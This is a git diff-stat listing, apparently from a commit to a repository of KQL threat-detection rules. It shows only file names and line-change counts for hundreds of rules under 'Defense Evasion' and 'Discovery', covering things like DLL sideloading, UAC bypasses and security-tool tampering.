.../potential_7za_dll_sideloading.kql | 22 +++++----- .../potential_adplus_exe_abuse.kql | 22 +++++----- .../potential_amsi_bypass_using_null_bits.kql | 18 ++++---- ...tential_amsi_bypass_via_net_reflection.kql | 22 +++++----- .../potential_amsi_com_server_hijacking.kql | 18 ++++---- 
...ial_antivirus_software_dll_sideloading.kql | 26 +++++------ ...cation_whitelisting_bypass_via_dnx_exe.kql | 24 +++++----- ..._arbitrary_code_execution_via_node_exe.kql | 22 +++++----- ...trary_command_execution_using_msdt_exe.kql | 18 ++++---- ...ntial_arbitrary_dll_load_using_winword.kql | 18 ++++---- ...file_download_using_office_application.kql | 18 ++++---- ...t_manager_settings_associations_tamper.kql | 22 +++++----- ...nt_manager_settings_attachments_tamper.kql | 22 +++++----- ...otential_autologger_sessions_tampering.kql | 18 ++++---- .../potential_base64_decoded_from_images.kql | 18 ++++---- ..._proxy_execution_via_vsdiagnostics_exe.kql | 22 +++++----- .../potential_ccleanerdu_dll_sideloading.kql | 22 +++++----- ...al_ccleanerreactivator_dll_sideloading.kql | 22 +++++----- ...al_chrome_frame_helper_dll_sideloading.kql | 18 ++++---- ...nd_line_path_traversal_evasion_attempt.kql | 24 +++++----- ...ne_obfuscation_using_escape_characters.kql | 18 ++++---- ...icode_characters_from_suspicious_image.kql | 20 ++++----- ...ealing_via_chromium_headless_debugging.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_1.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_2.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_3.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_4.kql | 18 ++++---- ...tial_defense_evasion_via_binary_rename.kql | 22 +++++----- ...via_rename_of_highly_relevant_binaries.kql | 24 +++++----- ...nse_evasion_via_right_to_left_override.kql | 24 +++++----- ...tential_dll_sideloading_of_dbgcore_dll.kql | 22 +++++----- ...tential_dll_sideloading_of_dbghelp_dll.kql | 22 +++++----- ...sideloading_of_libcurl_dll_via_gup_exe.kql | 18 ++++---- ..._sideloading_via_classicexplorer32_dll.kql | 18 ++++---- ...ntial_dll_sideloading_via_comctl32_dll.kql | 22 +++++----- ...potential_dll_sideloading_via_jsschhlp.kql | 18 ++++---- ...ded_powershell_patterns_in_commandline.kql | 18 ++++---- ...ntial_eventlog_file_location_tampering.kql | 
18 ++++---- ...al_fake_instance_of_hxtsr_exe_executed.kql | 22 +++++----- ...d_via_ms_appinstaller_protocol_handler.kql | 20 ++++----- ...ation_via_ntfs_index_allocation_stream.kql | 22 +++++----- ...n_via_ntfs_index_allocation_stream_cli.kql | 22 +++++----- ...lyph_attack_using_lookalike_characters.kql | 26 +++++------ ...using_lookalike_characters_in_filename.kql | 26 +++++------ ...otential_lethalhta_technique_execution.kql | 18 ++++---- .../potential_libvlc_dll_sideloading.kql | 22 +++++----- ...ential_lsass_process_dump_via_procdump.kql | 30 ++++++------- ...anage_bde_wsf_abuse_to_proxy_execution.kql | 22 +++++----- ...ial_memory_dumping_activity_via_livekd.kql | 22 +++++----- ...tial_meterpreter_cobaltstrike_activity.kql | 24 +++++----- .../potential_mftrace_exe_abuse.kql | 22 +++++----- .../potential_msiexec_masquerading.kql | 18 ++++---- ...tential_ntlm_coercion_via_certutil_exe.kql | 18 ++++---- ...l_obfuscated_ordinal_call_via_rundll32.kql | 18 ++++---- ...word_spraying_attempt_using_dsacls_exe.kql | 22 +++++----- ..._pendingfilerenameoperations_tampering.kql | 22 +++++----- ...tial_persistence_via_outlook_home_page.kql | 20 ++++----- ...ial_persistence_via_outlook_today_page.kql | 20 ++++----- .../potential_powershell_downgrade_attack.kql | 18 ++++---- ..._powershell_execution_policy_tampering.kql | 18 ++++---- ...xecution_policy_tampering_proccreation.kql | 18 ++++---- ...potential_powershell_execution_via_dll.kql | 20 ++++----- ...hell_obfuscation_via_reversed_commands.kql | 22 +++++----- ...lation_attempt_via_exe_local_technique.kql | 18 ++++---- ..._execution_proxy_via_cl_invocation_ps1.kql | 18 ++++---- ...y_key_abuse_for_binary_proxy_execution.kql | 18 ++++---- ...y_abuse_for_binary_proxy_execution_reg.kql | 18 ++++---- ...aunch_exe_binary_proxy_execution_abuse.kql | 18 ++++---- ...thorized_mbr_tampering_via_bcdedit_exe.kql | 18 ++++---- ...ntial_register_app_vbs_lolscript_abuse.kql | 22 +++++----- ...tial_regsvr32_commandline_flag_anomaly.kql | 22 
+++++----- ...dll32_execution_with_dll_stored_in_ads.kql | 18 ++++---- ...xy_execution_via_cl_mutexverifiers_ps1.kql | 18 ++++---- ..._bypass_via_windows_developer_features.kql | 18 ++++---- ...ia_windows_developer_features_registry.kql | 18 ++++---- ...potential_suspicious_mofcomp_execution.kql | 22 +++++----- ...s_windows_feature_enabled_proccreation.kql | 24 +++++----- ...otential_sysinternals_procdump_evasion.kql | 22 +++++----- ..._sideloading_from_non_system_locations.kql | 22 +++++----- ...pering_with_security_products_via_wmic.kql | 22 +++++----- ...azuh_security_platform_dll_sideloading.kql | 22 +++++----- ...t_reflectdebugger_registry_value_abuse.kql | 18 ++++---- ...indows_defender_tampering_via_wmic_exe.kql | 18 ++++---- .../potential_winnti_dropper_activity.kql | 18 ++++---- ...e_permissions_granted_using_dsacls_exe.kql | 22 +++++----- ...asp_net_compilation_via_aspnetcompiler.kql | 18 ++++---- ...ally_suspicious_cabinet_file_expansion.kql | 22 +++++----- ...ous_call_to_win32_nteventlogfile_class.kql | 18 ++++---- ...icious_child_process_of_diskshadow_exe.kql | 22 +++++----- ...y_suspicious_child_process_of_regsvr32.kql | 22 +++++----- ...ous_child_processes_spawned_by_conhost.kql | 22 +++++----- ...y_suspicious_cmd_shell_output_redirect.kql | 24 +++++----- ...icious_dll_registered_via_odbcconf_exe.kql | 22 +++++----- ...ally_suspicious_dmp_hdmp_file_creation.kql | 22 +++++----- ..._suspicious_event_viewer_child_process.kql | 18 ++++---- ...n_from_parent_process_in_public_folder.kql | 18 ++++---- ...y_suspicious_execution_from_tmp_folder.kql | 18 ++++---- ..._regasm_regsvcs_from_uncommon_location.kql | 18 ++++---- ...regasm_regsvcs_with_uncommon_extension.kql | 18 ++++---- ..._suspicious_googleupdate_child_process.kql | 18 ++++---- ...ocument_executed_from_trusted_location.kql | 18 ++++---- ...spicious_ping_copy_command_combination.kql | 18 ++++---- ...y_suspicious_regsvr32_http_ftp_pattern.kql | 18 ++++---- 
...ly_suspicious_regsvr32_http_ip_pattern.kql | 22 +++++----- ...tentially_suspicious_rundll32_activity.kql | 22 +++++----- ...ous_rundll32_exe_execution_of_udl_file.kql | 24 +++++----- ...s_volume_shadow_copy_vsstrace_dll_load.kql | 18 ++++---- ...y_suspicious_wdac_policy_file_creation.kql | 22 +++++----- ...tially_suspicious_windows_app_activity.kql | 22 +++++----- ..._suspicious_wuauclt_network_connection.kql | 20 ++++----- ...base64_encoded_frombase64string_cmdlet.kql | 18 ++++---- ...ell_base64_encoded_mppreference_cmdlet.kql | 18 ++++---- ...owershell_console_history_logs_deleted.kql | 18 ++++---- ...core_dll_loaded_via_office_application.kql | 18 ++++---- ...wershell_defender_disable_scan_feature.kql | 24 +++++----- .../powershell_defender_exclusion.kql | 24 +++++----- ...fault_action_set_to_allow_or_noaction_.kql | 26 +++++------ ...executed_from_headless_conhost_process.kql | 20 ++++----- ...ng_disabled_via_registry_key_tampering.kql | 18 ++++---- ...l_script_change_permission_via_set_acl.kql | 18 ++++---- .../powershell_set_acl_on_windows_folder.kql | 18 ++++---- ...ell_token_obfuscation_process_creation.kql | 18 ++++---- .../Defense Evasion/prefetch_file_deleted.kql | 18 ++++---- .../Defense Evasion/procdump_execution.kql | 22 +++++----- ...ss_access_via_trolleyexpress_exclusion.kql | 18 ++++---- ...rocess_creation_using_sysnative_folder.kql | 18 ++++---- ...n_from_a_potentially_suspicious_folder.kql | 18 ++++---- .../process_launched_without_image_name.kql | 22 +++++----- .../process_memory_dump_via_comsvcs_dll.kql | 22 +++++----- .../process_memory_dump_via_dotnet_dump.kql | 22 +++++----- ...ocess_proxy_execution_via_squirrel_exe.kql | 22 +++++----- .../proxy_execution_via_vshadow.kql | 28 ++++++------ .../proxy_execution_via_wuauclt_exe.kql | 18 ++++---- ...olicytest_creation_by_uncommon_process.kql | 18 ++++---- .../pua_advancedrun_suspicious_execution.kql | 18 ++++---- .../pua_cleanwipe_execution.kql | 22 +++++----- 
.../pua_defendercheck_execution.kql | 22 +++++----- ...ential_pe_metadata_tamper_using_rcedit.kql | 22 +++++----- .../pua_process_hacker_execution.kql | 26 +++++------ ...nt_file_dropped_in_suspicious_location.kql | 22 +++++----- .../pubprn_vbs_proxy_execution.kql | 18 ++++---- ...ion_security_warning_disabled_in_excel.kql | 20 ++++----- ...ity_warning_disabled_in_excel_registry.kql | 20 ++++----- ...ython_image_load_by_non_python_process.kql | 30 ++++++------- .../Defense Evasion/raccine_uninstall.kql | 22 +++++----- .../rdp_connection_allowed_via_netsh_exe.kql | 22 +++++----- .../rdp_sensitive_settings_changed.kql | 24 +++++----- ...rdp_sensitive_settings_changed_to_zero.kql | 24 +++++----- ...ion_without_commandline_flags_or_files.kql | 24 +++++----- ...iating_network_connection_to_public_ip.kql | 18 ++++---- .../regedit_as_trusted_installer.kql | 22 +++++----- .../register_app_vbs_proxy_execution.kql | 22 +++++----- .../registry_entries_for_azorult_malware.kql | 18 ++++---- ...y_persistence_via_service_in_safe_mode.kql | 18 ++++---- ...ecution_with_suspicious_file_extension.kql | 22 +++++----- ...cution_from_highly_suspicious_location.kql | 22 +++++----- ...ion_from_potential_suspicious_location.kql | 22 +++++----- ..._rurat_execution_from_unusual_location.kql | 18 ++++---- ...chm_file_download_execution_via_hh_exe.kql | 18 ++++---- .../remote_code_execute_via_winrm_vbs.kql | 18 ++++---- .../remote_file_download_via_findstr_exe.kql | 18 ++++---- .../remote_xsl_execution_via_msxsl_exe.kql | 22 +++++----- ...ablement_abuse_via_atomictestharnesses.kql | 18 ++++---- ...hosted_hta_file_executed_via_mshta_exe.kql | 18 ++++---- ...removal_of_amsi_provider_registry_keys.kql | 22 +++++----- ...x_value_to_hide_schedule_task_registry.kql | 18 ++++---- ...d_value_to_hide_schedule_task_registry.kql | 18 ++++---- .../remove_immutable_file_attribute.kql | 22 +++++----- .../remove_scheduled_cron_task_job.kql | 20 ++++----- .../renamed_autohotkey_exe_execution.kql | 18 ++++---- 
.../renamed_boinc_client_execution.kql | 18 ++++---- .../renamed_createdump_utility_execution.kql | 22 +++++----- .../renamed_mavinject_exe_execution.kql | 22 +++++----- .../renamed_megasync_execution.kql | 24 +++++----- .../renamed_microsoft_teams_execution.kql | 18 ++++---- .../renamed_msdt_exe_execution.kql | 22 +++++----- .../renamed_office_binary_execution.kql | 18 ++++---- .../renamed_plink_execution.kql | 18 ++++---- .../renamed_procdump_execution.kql | 26 +++++------ ...d_remote_utilities_rat_rurat_execution.kql | 18 ++++---- ...sponse_file_execution_via_odbcconf_exe.kql | 22 +++++----- ...tificate_installed_from_susp_locations.kql | 22 +++++----- .../run_powershell_script_from_ads.kql | 18 ++++---- ...ll_script_from_redirected_input_stream.kql | 18 ++++---- ..._execution_with_uncommon_dll_extension.kql | 18 ++++---- ...ecution_without_commandline_parameters.kql | 22 +++++----- .../rundll32_installscreensaver_execution.kql | 22 +++++----- .../rundll32_internet_connection.kql | 22 +++++----- .../rundll32_spawned_via_explorer_exe.kql | 18 ++++---- .../rundll32_spawning_explorer.kql | 18 ++++---- .../rundll32_unc_path_execution.kql | 22 +++++----- .../runmru_registry_key_deletion.kql | 22 +++++----- .../runmru_registry_key_deletion_registry.kql | 22 +++++----- ...eboot_registry_key_deleted_via_reg_exe.kql | 22 +++++----- .../Defense Evasion/scr_file_write_event.kql | 22 +++++----- .../screensaver_registry_key_set.kql | 22 +++++----- ...ostics_turn_off_check_enabled_registry.kql | 22 +++++----- ...g_commandline_process_spawned_regsvr32.kql | 24 +++++----- .../Defense Evasion/sdclt_child_processes.kql | 18 ++++---- ...nhost_calling_suspicious_child_process.kql | 18 ++++---- .../security_service_disabled_via_reg_exe.kql | 22 +++++----- ...e_from_potentially_suspicious_location.kql | 24 +++++----- ...ted_in_potentially_suspicious_location.kql | 22 +++++----- ...rvice_registry_key_deleted_via_reg_exe.kql | 22 +++++----- ...files_as_system_files_using_attrib_exe.kql 
| 18 ++++---- .../Defense Evasion/setuid_and_setgid.kql | 22 +++++----- ...tion_using_operating_systems_utilities.kql | 24 +++++----- ..._dll_execution_in_suspicious_directory.kql | 18 ++++---- .../space_after_filename_macos.kql | 22 +++++----- .../start_of_nt_virtual_dos_machine.kql | 22 +++++----- .../suspect_svchost_activity.kql | 22 +++++----- ...spicious_advpack_call_via_rundll32_exe.kql | 22 +++++----- ...ous_agentexecutor_powershell_execution.kql | 18 ++++---- ...lication_allowed_through_exploit_guard.kql | 22 +++++----- ..._access_agent_update_utility_execution.kql | 20 ++++----- ...us_cabinet_file_execution_via_msdt_exe.kql | 22 +++++----- .../suspicious_calculator_usage.kql | 18 ++++---- ...icious_child_process_created_as_system.kql | 18 ++++---- ...icious_child_process_of_aspnetcompiler.kql | 18 ++++---- ...suspicious_child_process_of_wermgr_exe.kql | 18 ++++---- .../suspicious_codepage_switch_via_chcp.kql | 22 +++++----- .../suspicious_control_panel_dll_load.kql | 18 ++++---- ...cious_copy_from_or_to_system_directory.kql | 28 ++++++------ .../suspicious_creation_with_colorcpl.kql | 18 ++++---- .../suspicious_customshellhost_execution.kql | 22 +++++----- ...diantz_alternate_data_stream_execution.kql | 22 +++++----- .../suspicious_dll_loaded_via_certoc_exe.kql | 18 ++++---- .../suspicious_double_extension_files.kql | 22 +++++----- ..._download_from_direct_ip_via_bitsadmin.kql | 18 ++++---- ...rom_file_sharing_website_via_bitsadmin.kql | 22 +++++----- .../suspicious_download_via_certutil_exe.kql | 18 ++++---- ...iver_dll_installation_via_odbcconf_exe.kql | 22 +++++----- .../suspicious_dumpminitool_execution.kql | 18 ++++---- ...vironment_variable_has_been_registered.kql | 18 ++++---- ...aring_or_configuration_change_activity.kql | 28 ++++++------ .../suspicious_executable_file_creation.kql | 20 ++++----- ...s_execution_of_installutil_without_log.kql | 18 ++++---- ...trac32_alternate_data_stream_execution.kql | 18 ++++---- 
...s_file_created_via_onenote_application.kql | 24 +++++----- ...le_creation_in_uncommon_appdata_folder.kql | 22 +++++----- ...loaded_from_direct_ip_via_certutil_exe.kql | 18 ++++---- ..._file_sharing_website_via_certutil_exe.kql | 18 ++++---- ...ile_encoded_to_base64_via_certutil_exe.kql | 18 ++++---- ...suspicious_files_in_default_gpo_folder.kql | 18 ++++---- .../suspicious_hh_exe_execution.kql | 18 ++++---- ...h_integritylevel_conhost_legacy_option.kql | 22 +++++----- ...iis_url_globalrules_rewrite_via_appcmd.kql | 22 +++++----- ...ous_javascript_execution_via_mshta_exe.kql | 18 ++++---- ...ious_lnk_double_extension_file_created.kql | 22 +++++----- ...picious_microsoft_office_child_process.kql | 18 ++++---- ...d_execution_by_uncommon_parent_process.kql | 18 ++++---- .../suspicious_msdt_parent_process.kql | 18 ++++---- .../suspicious_mshta_child_process.kql | 24 +++++----- .../suspicious_msiexec_embedding_parent.kql | 18 ++++---- ...spicious_msiexec_execute_arbitrary_dll.kql | 24 +++++----- ...xec_quiet_install_from_remote_location.kql | 18 ++++---- ...twork_connection_binary_no_commandline.kql | 18 ++++---- .../suspicious_obfuscated_powershell_code.kql | 18 ++++---- .../suspicious_package_installed_linux.kql | 22 +++++----- ...parent_double_extension_file_execution.kql | 18 ++++---- ...eyboard_layout_ime_file_registry_value.kql | 22 +++++----- ...uspicious_ping_del_command_combination.kql | 18 ++++---- ...xecution_to_change_lock_screen_timeout.kql | 18 ++++---- ...l_invocations_specific_processcreation.kql | 18 ++++---- ...us_process_masquerading_as_svchost_exe.kql | 24 +++++----- .../suspicious_process_parents.kql | 18 ++++---- .../suspicious_process_start_locations.kql | 22 +++++----- ..._via_werfaultsecure_through_edr_freeze.kql | 22 +++++----- ...ous_procexp152_sys_file_created_in_tmp.kql | 24 +++++----- ..._whitelisted_in_firewall_via_netsh_exe.kql | 18 ++++---- ...uspicious_provlaunch_exe_child_process.kql | 18 ++++---- .../suspicious_rasdial_activity.kql 
| 22 +++++----- .../suspicious_recursive_takeown.kql | 24 +++++----- ...s_regsvr32_execution_from_remote_share.kql | 18 ++++---- ...sponse_file_execution_via_odbcconf_exe.kql | 22 +++++----- ...us_rundll32_activity_invoking_sys_file.kql | 18 ++++---- ...undll32_execution_with_image_extension.kql | 18 ++++---- ...picious_rundll32_setupapi_dll_activity.kql | 22 +++++----- .../suspicious_service_binary_directory.kql | 18 ++++---- .../suspicious_service_installed.kql | 24 +++++----- ...ious_shellexec_rundll_call_via_ordinal.kql | 20 ++++----- ...us_speech_runtime_binary_child_process.kql | 24 +++++----- .../suspicious_splwow64_without_params.kql | 18 ++++---- ...indows_defender_feature_via_powershell.kql | 18 ++++---- .../suspicious_usage_of_shellexec_rundll.kql | 18 ++++---- ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 22 +++++----- ...ous_volume_shadow_copy_vssapi_dll_load.kql | 18 ++++---- ...t_command_with_agentextensionpath_load.kql | 22 +++++----- ...der_folder_exclusion_added_via_reg_exe.kql | 22 +++++----- ...der_registry_key_tampering_via_reg_exe.kql | 22 +++++----- .../suspicious_windows_service_tampering.kql | 22 +++++----- ...race_etw_session_tamper_via_logman_exe.kql | 24 +++++----- ...ous_windows_update_agent_empty_cmdline.kql | 18 ++++---- ...uspicious_wordpad_outbound_connections.kql | 24 +++++----- ...cious_workstation_locking_via_rundll32.kql | 22 +++++----- ...icious_x509enrollment_process_creation.kql | 22 +++++----- ...picious_xor_encoded_powershell_command.kql | 18 ++++---- ...rver_execute_arbitrary_powershell_code.kql | 22 +++++----- ..._vbs_execute_arbitrary_powershell_code.kql | 18 ++++---- ...ternals_pssuspend_suspicious_execution.kql | 22 +++++----- ...earing_or_removal_via_system_utilities.kql | 24 +++++----- .../sysmon_configuration_update.kql | 22 +++++----- .../sysmon_driver_altitude_change.kql | 24 +++++----- .../sysmon_driver_unloaded_via_fltmc_exe.kql | 22 +++++----- ...nel_item_loaded_from_uncommon_location.kql | 18 ++++---- 
...system_file_execution_location_anomaly.kql | 18 ++++---- ...information_discovery_via_sysctl_macos.kql | 24 +++++----- ...r_windows_defender_remove_mppreference.kql | 22 +++++----- .../tamper_with_sophos_av_registry_keys.kql | 22 +++++----- .../taskkill_symantec_endpoint_protection.kql | 22 +++++----- .../taskmgr_as_local_system.kql | 18 ++++---- .../teamviewer_log_file_deleted.kql | 18 ++++---- .../third_party_software_dll_sideloading.kql | 18 ++++---- .../time_travel_debugging_utility_usage.kql | 22 +++++----- ...e_travel_debugging_utility_usage_image.kql | 22 +++++----- .../tomcat_webserver_logs_deleted.kql | 24 +++++----- .../touch_suspicious_service_file.kql | 22 +++++----- ...le_cross_ebpf_rootkit_default_lockfile.kql | 22 +++++----- ...riple_cross_ebpf_rootkit_execve_hijack.kql | 22 +++++----- ...le_cross_ebpf_rootkit_install_commands.kql | 22 +++++----- ...ypass_abusing_winsat_path_parsing_file.kql | 18 ++++---- ...ss_abusing_winsat_path_parsing_process.kql | 18 ++++---- ...s_abusing_winsat_path_parsing_registry.kql | 18 ++++---- ...ac_bypass_tools_using_computerdefaults.kql | 18 ++++---- .../uac_bypass_using_changepk_and_slui.kql | 18 ++++---- ...bypass_using_consent_and_comctl32_file.kql | 18 ++++---- ...ass_using_consent_and_comctl32_process.kql | 18 ++++---- .../uac_bypass_using_disk_cleanup.kql | 18 ++++---- .../uac_bypass_using_dismhost.kql | 18 ++++---- ..._bypass_using_event_viewer_recentviews.kql | 18 ++++---- .../uac_bypass_using_eventvwr.kql | 18 ++++---- .../uac_bypass_using_ieinstal_file.kql | 18 ++++---- .../uac_bypass_using_ieinstal_process.kql | 18 ++++---- .../uac_bypass_using_iscsicpl_imageload.kql | 18 ++++---- ...using_msconfig_token_modification_file.kql | 18 ++++---- ...ng_msconfig_token_modification_process.kql | 18 ++++---- ..._bypass_using_net_code_profiler_on_mmc.kql | 18 ++++---- ...c_bypass_using_ntfs_reparse_point_file.kql | 18 ++++---- ...ypass_using_ntfs_reparse_point_process.kql | 18 ++++---- 
.../uac_bypass_using_pkgmgr_and_dism.kql | 18 ++++---- ...bypass_using_windows_media_player_file.kql | 18 ++++---- ...ass_using_windows_media_player_process.kql | 18 ++++---- ...ss_using_windows_media_player_registry.kql | 18 ++++---- .../uac_bypass_via_event_viewer.kql | 18 ++++---- .../uac_bypass_via_icmluautil.kql | 18 ++++---- .../Defense Evasion/uac_bypass_via_sdclt.kql | 18 ++++---- ...ss_via_windows_firewall_snap_in_hijack.kql | 18 ++++---- .../uac_bypass_via_wsreset.kql | 18 ++++---- .../Defense Evasion/uac_bypass_wsreset.kql | 18 ++++---- .../ufw_force_stop_using_ufw_init.kql | 22 +++++----- ...on_addinutil_exe_commandline_execution.kql | 18 ++++---- ...pplications_execution_via_atbroker_exe.kql | 22 +++++----- ...ncommon_child_process_of_addinutil_exe.kql | 18 ++++---- .../uncommon_child_process_of_appvlp_exe.kql | 24 +++++----- ...ommon_child_process_of_defaultpack_exe.kql | 18 ++++---- .../uncommon_child_process_of_setres_exe.kql | 26 +++++------ ..._child_process_spawned_by_odbcconf_exe.kql | 24 +++++----- ...eyboard_layout_ime_file_registry_value.kql | 26 +++++------ ..._file_creation_by_mysql_daemon_process.kql | 20 ++++----- ..._filesystem_load_attempt_by_format_com.kql | 18 ++++---- .../uncommon_link_exe_parent_process.kql | 26 +++++------ .../uncommon_outbound_kerberos_connection.kql | 22 +++++----- .../uncommon_sigverif_exe_child_process.kql | 18 ++++---- .../uncommon_svchost_parent_process.kql | 18 ++++---- .../uninstall_crowdstrike_falcon_sensor.kql | 22 +++++----- .../uninstall_sysinternals_sysmon.kql | 22 +++++----- .../unmount_share_via_net_exe.kql | 22 +++++----- .../use_icacls_to_hide_file_to_everyone.kql | 18 ++++---- .../use_ntfs_short_name_in_command_line.kql | 22 +++++----- .../use_ntfs_short_name_in_image.kql | 22 +++++----- .../Defense Evasion/use_of_remote_exe.kql | 22 +++++----- .../use_of_scriptrunner_exe.kql | 22 +++++----- ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 18 ++++---- .../Defense Evasion/use_of_ttdinject_exe.kql | 
22 +++++----- .../use_of_visualuiaverifynative_exe.kql | 22 +++++----- .../use_of_vsiisexelauncher_exe.kql | 18 ++++---- KQL/rules/Defense Evasion/use_of_wfc_exe.kql | 22 +++++----- .../use_short_name_path_in_image.kql | 22 +++++----- .../utilityfunctions_ps1_proxy_dll.kql | 18 ++++---- .../verclsid_exe_runs_com_object.kql | 18 ++++---- ...driver_installation_or_starting_of_vms.kql | 22 +++++----- ...sual_basic_command_line_compiler_usage.kql | 22 +++++----- ...ab_execution_from_non_default_location.kql | 18 ++++---- ...bmig_unusual_parent_or_child_processes.kql | 18 ++++---- .../weak_or_abused_passwords_in_cli.kql | 26 +++++------ .../wfp_filter_added_via_registry.kql | 18 ++++---- ...s_binaries_write_suspicious_extensions.kql | 18 ++++---- .../windows_defender_context_menu_removed.kql | 26 +++++------ ...dows_defender_definition_files_removed.kql | 18 ++++---- ...ndows_defender_exclusion_list_modified.kql | 22 +++++----- ...ows_defender_exclusions_added_registry.kql | 22 +++++----- ...ows_defender_service_disabled_registry.kql | 22 +++++----- ...hreat_severity_default_action_modified.kql | 28 ++++++------ ...ndows_firewall_disabled_via_powershell.kql | 18 ++++---- .../windows_kernel_debugger_execution.kql | 22 +++++----- ..._processes_suspicious_parent_directory.kql | 22 +++++----- .../winget_admin_settings_modification.kql | 22 +++++----- ...exe_uncommon_argument_or_child_process.kql | 20 ++++----- .../wmic_loading_scripting_libraries.kql | 26 +++++------ .../write_protect_for_storage_disabled.kql | 20 ++++----- ...of_malicious_files_to_the_fonts_folder.kql | 18 ++++---- .../Defense Evasion/wsl_kali_linux_usage.kql | 22 +++++----- ...mon_locations_via_presentationhost_exe.kql | 22 +++++----- .../xsl_script_execution_via_wmic_exe.kql | 28 ++++++------ ...ctory_database_snapshot_via_adexplorer.kql | 18 ++++---- ...ing_complete_ad_snapshot_into_dat_file.kql | 22 +++++----- .../advanced_ip_scanner_file_event.kql | 22 +++++----- 
..._monitoring_agent_registry_keys_access.kql | 20 ++++----- ...th_service_agents_registry_keys_access.kql | 24 +++++----- .../Discovery/bloodhound_collection_files.kql | 22 +++++----- .../capabilities_discovery_linux.kql | 18 ++++---- ...y_and_export_via_get_adcomputer_cmdlet.kql | 22 +++++----- ...ter_system_reconnaissance_via_wmic_exe.kql | 18 ++++---- .../console_codepage_lookup_via_chcp.kql | 24 +++++----- ...esidence_discovery_via_proc_virtual_fs.kql | 24 +++++----- KQL/rules/Discovery/crontab_enumeration.kql | 22 +++++----- .../detected_windows_software_discovery.kql | 22 +++++----- KQL/rules/Discovery/dirlister_execution.kql | 22 +++++----- .../Discovery/discovery_of_a_system_time.kql | 22 +++++----- ...tainer_discovery_via_dockerenv_listing.kql | 24 +++++----- .../domain_trust_discovery_via_dsquery.kql | 22 +++++----- .../Discovery/driverquery_exe_execution.kql | 22 +++++----- ...merate_all_information_with_whoami_exe.kql | 18 ++++---- ...ork_configuration_discovery_via_esxcli.kql | 22 +++++----- ...orage_information_discovery_via_esxcli.kql | 22 +++++----- ...ystem_information_discovery_via_esxcli.kql | 22 +++++----- .../esxi_vm_list_discovery_via_esxcli.kql | 22 +++++----- ..._vsan_information_discovery_via_esxcli.kql | 22 +++++----- .../file_and_directory_discovery_linux.kql | 22 +++++----- .../file_and_directory_discovery_macos.kql | 22 +++++----- ..._subfolder_enumeration_via_dir_command.kql | 22 +++++----- ...ing_explorer_folder_shortcut_via_shell.kql | 18 ++++---- ..._configuration_discovery_via_netsh_exe.kql | 22 +++++----- .../Discovery/fsutil_drive_enumeration.kql | 22 +++++----- ...kinfo_vbs_reconnaissance_script_output.kql | 18 ++++---- ...esult_display_group_policy_information.kql | 18 ++++---- ...mbership_reconnaissance_via_whoami_exe.kql | 18 ++++---- ...cktool_bloodhound_sharphound_execution.kql | 22 +++++----- .../Discovery/hacktool_certify_execution.kql | 18 ++++---- .../Discovery/hacktool_certipy_execution.kql | 22 +++++----- 
.../hacktool_sharpldapmonitor_execution.kql | 18 ++++---- .../hacktool_sharpldapwhoami_execution.kql | 22 +++++----- .../hacktool_sharpview_execution.kql | 18 ++++---- .../hacktool_soaphound_execution.kql | 18 ++++---- .../hacktool_trufflesnout_execution.kql | 18 ++++---- ...ting_of_wifi_credentials_via_netsh_exe.kql | 18 ++++---- ...twork_service_scanning_tools_execution.kql | 22 +++++----- .../linux_remote_system_discovery.kql | 22 +++++----- .../Discovery/local_accounts_discovery.kql | 22 +++++----- .../local_groups_discovery_linux.kql | 22 +++++----- .../local_groups_discovery_macos.kql | 22 +++++----- ...cal_groups_reconnaissance_via_wmic_exe.kql | 24 +++++----- .../local_system_accounts_discovery_linux.kql | 22 +++++----- .../local_system_accounts_discovery_macos.kql | 22 +++++----- .../macos_network_service_scanning.kql | 22 +++++----- .../macos_remote_system_discovery.kql | 22 +++++----- .../network_reconnaissance_activity.kql | 22 +++++----- .../Discovery/network_sniffing_macos.kql | 24 +++++----- ...rk_trace_capture_started_via_netsh_exe.kql | 22 +++++----- KQL/rules/Discovery/nltest_exe_execution.kql | 22 +++++----- .../notepad_password_files_discovery.kql | 22 +++++----- .../obfuscated_ip_download_activity.kql | 18 ++++---- KQL/rules/Discovery/obfuscated_ip_via_cli.kql | 18 ++++---- .../os_architecture_discovery_via_grep.kql | 18 ++++---- .../permission_check_via_accesschk_exe.kql | 22 +++++----- KQL/rules/Discovery/pktmon_exe_execution.kql | 22 +++++----- ...scan_binary_data_transmission_activity.kql | 20 ++++----- ...and_service_reconnaissance_via_reg_exe.kql | 22 +++++----- ...container_discovery_via_inodes_listing.kql | 24 +++++----- ...al_discovery_activity_using_find_linux.kql | 18 ++++---- ...al_discovery_activity_using_find_macos.kql | 18 ++++---- ...tial_discovery_activity_via_dnscmd_exe.kql | 22 +++++----- ...tential_gobrat_file_discovery_via_grep.kql | 18 ++++---- ...l_recon_activity_using_driverquery_exe.kql | 22 +++++----- 
...otential_recon_activity_via_nltest_exe.kql | 22 +++++----- ...nce_activity_via_gathernetworkinfo_vbs.kql | 22 +++++----- .../pua_adfind_suspicious_execution.kql | 22 +++++----- .../Discovery/pua_adidnsdump_execution.kql | 20 ++++----- .../pua_advanced_ip_scanner_execution.kql | 22 +++++----- .../pua_advanced_port_scanner_execution.kql | 24 +++++----- KQL/rules/Discovery/pua_crassus_execution.kql | 22 +++++----- .../Discovery/pua_nmap_zenmap_execution.kql | 22 +++++----- .../Discovery/pua_seatbelt_execution.kql | 22 +++++----- .../pua_softperfect_netscan_execution.kql | 24 +++++----- ...vedirectory_enumeration_via_adfind_exe.kql | 22 +++++----- .../Discovery/pua_trufflehog_execution.kql | 26 +++++------ .../pua_trufflehog_execution_linux.kql | 26 +++++------ .../Discovery/python_initiated_connection.kql | 22 +++++----- ...on_command_output_piped_to_findstr_exe.kql | 20 ++++----- .../Discovery/renamed_whoami_execution.kql | 18 ++++---- .../sam_registry_hive_handle_request.kql | 18 ++++---- .../security_software_discovery_linux.kql | 22 +++++----- .../security_software_discovery_macos.kql | 22 +++++----- ...y_tools_keyword_lookup_via_findstr_exe.kql | 20 ++++----- ..._and_session_enumeration_using_net_exe.kql | 22 +++++----- .../Discovery/shell_execution_gcc_linux.kql | 18 ++++---- .../shell_execution_via_find_linux.kql | 18 ++++---- .../shell_execution_via_flock_linux.kql | 18 ++++---- .../shell_execution_via_nice_linux.kql | 18 ++++---- 